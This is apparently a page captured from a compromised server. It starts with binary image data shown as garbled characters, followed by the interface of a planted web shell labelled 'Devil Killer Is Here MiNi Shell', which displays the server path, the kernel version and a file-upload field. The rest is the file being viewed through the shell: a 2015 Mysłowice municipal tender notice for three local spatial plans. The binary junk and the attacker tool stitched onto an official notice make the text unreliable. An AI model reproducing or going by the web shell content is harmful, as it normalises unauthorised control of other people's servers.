JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150211/18273-N-2015.html

<p class="kh_header"><b>Mysłowice: Plany Miejscowe MPZP wraz z opracowaniami specjalistycznymi z podziałem na 3 części zamówienia</b><br>
<b>Numer ogłoszenia: 18273 - 2015; data zamieszczenia: 11.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Mysłowice , Ul. Powstańców 1, 41-400 Mysłowice, woj. śląskie, tel. 32 223 40 75, faks 32 223 40 75; 222 25 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myslowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Plany Miejscowe MPZP wraz z opracowaniami specjalistycznymi z podziałem na 3 części zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zadanie pod nazwą:Plany miejscowe MPZP wraz z opracowaniami specjalistycznymi z podziałem na 3 części zamówienia.
2. Przedmiot zamówienia obejmuje sporządzenie trzech projektów planów miejscowych, w tym:
2.1) część nr 1: miejscowego planu zagospodarowania przestrzennego Brzezinka Północna w Mysłowicach - zgodnie z Uchwałą Rady Miasta Mysłowice Nr LXI/1168/14 z dnia 30 października 2014 r.;
2.2) część nr 2: miejscowego planu zagospodarowania przestrzennego Brzęczkowice Wschodnie w Mysłowicach - zgodnie z Uchwałą Rady Miasta Mysłowice Nr LXI/1169/14 z dnia 30 października 2014 r.;
2.3) część nr 3: miejscowego planu zagospodarowania przestrzennego Kosztowy Północne w Mysłowicach - zgodnie z Uchwałą Rady Miasta Mysłowice Nr LXI/1170/14 z dnia 30 października 2014 r.
3. Dane wyjściowe:
3.1) część nr 1 - MPZP Brzezinka Północna:
- powierzchnia obszaru planu [ha]: 105,
- liczba mieszkańców jednostki osadniczej objętej planem: 3076,
- skala rysunku planu: 1:1000; 
3.2) część nr 2 - MPZP Brzęczkowice Wschodnie:
- powierzchnia obszaru planu [ha]: 129,
- liczba mieszkańców jednostki osadniczej objętej planem: 7905,
- skala rysunku planu: 1:1000;
3.3) część nr 3 - MPZP Kosztowy Północne:
- powierzchnia obszaru planu [ha]: 48,
- liczba mieszkańców jednostki osadniczej objętej planem: 1275,
- skala rysunku planu: 1:1000.
Na każdą z ww. części zamówienia zostanie zawarta odrębna umowa według projektu stanowiącego zał. nr 14 do siwz.
4. Sporządzenie każdego projektu miejscowego planu zagospodarowania przestrzennego obejmuje
m.in.:
- opracowanie wytycznych planistycznych na podstawie studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy, planu zagospodarowania przestrzennego województwa, poprzednio obowiązujących planów miejscowych, wyników analizy zmian w zagospodarowaniu przestrzennym miasta Mysłowice, analizy rejestru wniosków o sporządzenie planu miejscowego, wydanych decyzji administracyjnych (o warunkach zabudowy, o pozwoleniu na budowę), analizy wniosków złożonych do 
zawiadomienia/ogłoszenia o przystąpieniu do sporządzenia planu miejscowego,
- ocenę istniejącego stanu zagospodarowania przestrzennego obszaru planu miejscowego,
w tym m.in. analizę sposobu użytkowania terenów i obiektów, sposobu zagospodarowania terenów, stanu zabudowy, identyfikację konfliktów funkcjonalno-przestrzennych, terenów wymagających przekształceń i rehabilitacji,
- analizę własności terenów,
- analizę stanu uzbrojenia technicznego terenu, w tym m.in. sieci wodno-kanalizacyjnej, gazowej, elektro-energetycznej, ciepłowniczej, telekomunikacyjnej, urządzeń melioracyjnych oraz przeciwpowodziowych,
- analizę infrastruktury komunikacyjnej - drogi kołowe i szynowe,
- ocenę stanu środowiska kulturowego,
- rozpoznanie uwarunkowań przyrodniczych, górniczych, określenie obszarów ograniczonej zabudowy i zagospodarowania, obiektów lub obszarów filarów ochronnych,
- sporządzenie albo aktualizację opracowania ekofizjograficznego,
- sporządzenie koncepcji planu miejscowego, przedstawienie koncepcji, właściwej radzie dzielnicy
i władzom gminy, wniesienie odpowiednich i możliwych korekt,
- sporządzenie prognozy oddziaływania na środowisko wraz ze wszystkimi dokumentami potrzebnymi do przeprowadzenia strategicznej oceny oddziaływania na środowisko,
- sporządzenie prognozy skutków finansowych wraz z projektem załącznika o sposobie realizacji inwestycji gminnych z zakresu infrastruktury i zasadach ich finansowania,
- sporządzenie projektu planu miejscowego oraz wprowadzenie zmian do projektu planu, wynikających z uzyskanych opinii, dokonanych uzgodnień i rozpatrzonych uwag,
- sporządzenie wzorów pism i dokumentów wymaganych procedurą sporządzania planu miejscowego, potrzebnych do przeprowadzenia kompletnej procedury sporządzenia i uchwalenia planu, w tym w szczególności do ogłoszeń, obwieszczeń, zawiadomień oraz wystąpień o opinie i uzgodnienia projektu planu,
- przygotowanie propozycji stanowiska w sprawie zgłoszonych wniosków oraz uwag, sporządzenie listy nieuwzględnionych uwag,
- sporządzenie projektu uchwały w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego wraz z wymaganymi załącznikami,
- skompletowanie dokumentacji prac planistycznych, w tym dokumentacji formalno-prawnej,
- powtórzenie ww. niezbędnych czynności jeżeli zajdzie taka potrzeba w trakcie przeprowadzania procedury planistycznej.
4.1. Szczegółowy zakres prac i obowiązków, podział prac na etapy oraz przewidywane terminy ich przekazania określa harmonogram rzeczowo-terminowy stanowiący załącznik do projektu umowy.
4.2. Wykonawca jest zobowiązany do rozpoznania stopnia dostępności materiałów koniecznych do realizacji przedmiotu zamówienia w podmiotach dysponujących tymi materiałami, w tym wykonawca, dokona oceny możliwości wykorzystania ekofizjografii dla miasta Mysłowice z 2005 r. na cele opracowania projektu planu i wykona niezbędną aktualizację, a jeżeli uzna, że jest ona niewystarczająca, sporządzi opracowanie ekofizjograficzne dla planu miejscowego.
4.3. Przedstawiciele wykonawcy według ustaleń z Zamawiającym zobowiązani są do uczestnictwa w posiedzeniach komisji urbanistyczno-architektonicznej, uczestnictwa w wyłożeniu do publicznego wglądu projektu planu miejscowego, publicznej dyskusji nad przyjętymi w projekcie planu rozwiązaniami oraz do uczestnictwa w sesji Rady Miasta, na której uchwalany będzie miejscowy plan zagospodarowania przestrzennego.
4.4. Wykonawca zobowiązany jest na swój koszt do zamieszczenia w prasie ogłoszeń Zamawiającego działającego jako organ administracji publicznej wymaganych przepisami prawa w sprawach związanych z przedmiotem umowy.
4.5. Zamawiający zobowiązany jest do zapłaty za wysyłkę korespondencji i poniesienia kosztów związanych z opiniowaniem projektu planu przez komisję urbanistyczno-architektoniczną. Wykonawcę obciążają inne ewentualne koszty pozyskania opinii i uzgodnień.
4.6. Każdy etap opracowania będący przedmiotem odbioru musi zostać podpisany przez głównego projektanta, a prognoza skutków finansowych przez rzeczoznawcę majątkowego.
4.7. Wykonawca zobowiązany jest do stworzenia bazy danych w rozszerzeniach tab. lub shp. dla każdego wydzielonego terenu o różnym przeznaczeniu w planie miejscowym lub różnych zasadach zagospodarowania. Tabela ma zawierać następujące kolumny w kolejności: Symbol, Uwagi, Plan, Symb_2, Pow_ha.
Kolumny mają zawierać następujące dane:
Symbol - oznaczenie literowe identyfikujące tereny o różnym przeznaczeniu w planie miejscowym lub różnych zasadach zagospodarowania, Uwagi - uwagi projektanta wg potrzeb, Plan - nr kolejny planu z rejestru planów miejscowych, Symb_2 - oznaczenie literowe identyfikujące przeważające przeznaczenie na wydzielonym terenie wg poniższego: M - zabudowa mieszkaniowa,
MW - zabudowa mieszkaniowa wielorodzinna, U - zabudowa usługowa, P - zabudowa przemysłowa, K - tereny komunikacji, Z - tereny zieleni, R - tereny rolnicze,  KP - parkingi, Pow_ha - powierzchnia danego terenu w hektarach.
Każdy wydzielony teren musi być oznaczony granicą i symbolem identyfikującym jego przeznaczenie.
Bazę danych należy utworzyć także dla granicy planu miejscowego. Tabela ma obejmować następujące kolumny w kolejności:
Nazwa, Uchwała_inicjuj, Uchwała_przyjmuj, Ogłoszenie, Pow_ha, Uwagi, Wykonawca, Nr, Sort, ustawa.
Kolumny mają zawierać następujące dane:
Nazwa - nazwa planu miejscowego wg wzoru: mpzp____ lub zmpzp___
Uchwała_inicjuj - nr uchwały o przystąpieniu do sporządzenia planu miejscowego wg wzoru: ___ [nr] z dn. ___ [dzień, miesiąc, rok],
Uchwała_przyjmuj - nr uchwały o sporządzeniu planu miejscowego wg wzoru: ___ [nr] z dn. ___ [dzień, miesiąc, rok],
Ogłoszenie - publikacja uchwały w dzienniku urzędowym wg wzoru: D.U.W.Śl. Nr ___ poz. ___ z dn. ___ [dzień, miesiąc, rok],
Pow_ha - powierzchnia planu miejscowego w hektarach,
Uwagi - uwagi projektanta wg potrzeb,
Wykonawca - nazwa firmy wykonującej umowę 
Nr - nr kolejny planu z rejestru planów miejscowych,
Sort - puste pole,
ustawa - nazwa ustawy stanowiącej podstawę sporządzenia projektu planu miejscowego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 450.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 
1.1) część zamówienia nr 1 - wymagane wadium na kwotę: 1.100,00 PLN (słownie: jeden tysiąc sto złotych 00/100);
1.2) część zamówienia nr 2 - wymagane wadium na kwotę: 1.000,00 PLN (słownie: jeden tysiąc złotych 00/100);
1.3) część zamówienia nr 3 - wymagane wadium na kwotę: 800,00 PLN (słownie: osiemset złotych 00/100).
a w przypadku złożenia oferty na dwie lub więcej części, o wartości stanowiącej sumę wartości wadium każdej z części osobno. 
2. Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j.: Dz. U. z 2014 r.   poz. 1804).
3. Wadium wnoszone w formie pieniężnej należy wpłacić wyłącznie przelewem na rachunek bankowy: Miasto Mysłowice - ING Bank Śląski S.A., nr 13 1050 1214 1000 0023 5654 6974. Wadium musi znajdować się na koncie Zamawiającego w terminie określonym uPzp, przy czym wykonawca poprzez załączenie do składanej oferty dowodu wpłaty wykazuje Zamawiającemu, że wpłacenie nastąpiło w czasie niezbędnym do spełnienia wcześniej określonego wymogu.
4. Oryginał wadium wniesionego w formie niepieniężnej należy dołączyć do oferty.
5. Wadium wniesione w innej formie niż w pieniądzu winno zawierać bezwarunkowe i nieodwołalne zobowiązanie podmiotu udzielającego gwarancji lub poręczenia wypłaty kwoty wadium na każde żądanie Zamawiającego we wszystkich wypadkach wymienionych w art. 46 ust. 4a i 5 ustawy, 
przy czym warunki automatycznego i całkowitego wygaśnięcia wadium wniesionego w formie niepieniężnej nie mogą być sprzeczne z ustawą Prawo zamówień publicznych, bowiem 
w sytuacji wspomnianej sprzeczności z ustawą Prawo zamówień publicznych wadium 
nie będzie zabezpieczać oferty w sposób prawem przewidziany.
6. Wadium wnoszone w pieniądzu zachowuje ważność przez cały okres jego przechowywania
na rachunku bankowym. Wadium wnoszone w formie niepieniężnej musi być ważne co najmniej
od dnia, w którym przypada termin składania ofert, do dnia, w którym upływa termin związania ofertą
(jeżeli przypada na dzień ustawowo wolny od pracy, to do pierwszego dnia następującego po dniu ustawowo wolnym od pracy).
7. Zamawiający zatrzyma wadium wraz z odsetkami w przypadku zaistnienia okoliczności, o których mowa w art. 46 ust. 4a i 5 ustawy.
8. Zwrot, a także ponowne wniesienie wadium następuje według przepisów ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykazanie, że wykonawca wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na sporządzeniu miejscowego planu zagospodarowania przestrzennego, opublikowanego w Dzienniku Urzędowym o powierzchni obszaru planu nie mniejszej niż 100 ha oraz jedną usługę polegającą na sporządzeniu miejscowego planu zagospodarowania przestrzennego, opublikowanego w Dzienniku Urzędowym, który obejmuje obszar stanowiący teren górniczy lub jego fragment i w swoich ustaleniach zawiera problematykę terenów górniczych
albo
- wykazanie, że wykonawca wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na sporządzeniu miejscowego planu zagospodarowania przestrzennego, który został opublikowany w Dzienniku Urzędowym o powierzchni obszaru planu nie mniejszej niż 100 ha, który obejmuje obszar stanowiący teren górniczy lub jego fragment i w swoich ustaleniach zawiera problematykę terenów górniczych,
uwagi:
- Zamawiający wymaga wykazania ww. usługi/usług/ niezależnie od liczby części na które złożono ofertę,
- sporządzenie planu dla terenu górniczego spełnia wymóg wykonania usługi polegającej
na sporządzeniu miejscowego planu zagospodarowania przestrzennego, który obejmuje obszar stanowiący teren górniczy lub jego fragment w rozumieniu przepisów ustawy Prawo geologiczne i górnicze i w swoich ustaleniach zawiera problematykę terenów górniczych,w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania ww. warunku udziału w postępowaniu sumowaniu podlega wiedza i doświadczenie ww. wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/ami/ posiadającą/ymi/:
- uprawnienia do sporządzania projektów planów zagospodarowania przestrzennego* zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j.: Dz. U. z 2012 r., poz. 647 z późn. zm.), do pełnienia funkcji głównego projektanta planu,
- uprawnienia rzeczoznawcy majątkowego i wpis do centralnego rejestru rzeczoznawców majątkowych* zgodnie z ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j.: Dz. U. z 2014 r., poz. 518), do sporządzenia prognozy skutków finansowych,
(* wydane na podstawie właściwych przepisów prawa polskiego)
albo
- wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/ami/ posiadającą/ymi/ odpowiadające ww. uprawnieniom kwalifikacje zawodowe, które zostały uznane na zasadach określonych w przepisach odrębnych (odnoszące się np. do prawa międzynarodowego), do pełnienia funkcji głównego projektanta planu, oraz do sporządzenia prognozy skutków finansowych,
uwagi:
- Zamawiający wymaga wykazania osoby/osób/ posiadającej/ych/ ww. uprawnienia albo kwalifikacje zawodowe niezależnie od liczby części na które złożono ofertę,
- Zamawiający wymaga wykazania dysponowania dwoma osobami posiadającymi każda z osobna wymagane uprawnienia, o których mowa wyżej bądź jedną osobą posiadającą oba uprawnienia,
lub posiadającą/ymi/ odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które upoważniają do pełnienia ww. funkcji, albo wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/ami/ (pełniącą/ymi/ ww. funkcje) posiadającą/ymi/ odpowiadające ww. uprawnieniom kwalifikacje zawodowe, które zostały uznane na zasadach określonych w przepisach odrębnych (odnoszące się np. do prawa międzynarodowego),
w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania ww. warunku udziału w postępowaniu sumowaniu podlega potencjał osobowy ww. wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.  2. Pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 3. Wykonawca, o którym mowa w art. 26 ust. 2b zd. 1 uPzp, zobowiązany jest do udowodnienia Zamawiającemu okoliczności wskazanych w tym zdaniu, na zasadach o których mowa w zd. 2 art. 26 ust. 2b (w szczególności oryginał pisemnego zobowiązania tych podmiotów - zał. nr 11 do siwz).
4. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedłożenia dokumentów dotyczących w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu, 
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
5. Karta ofertowa (zał. nr 12 do siwz).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania zamówienia - 30</li>
</ul>
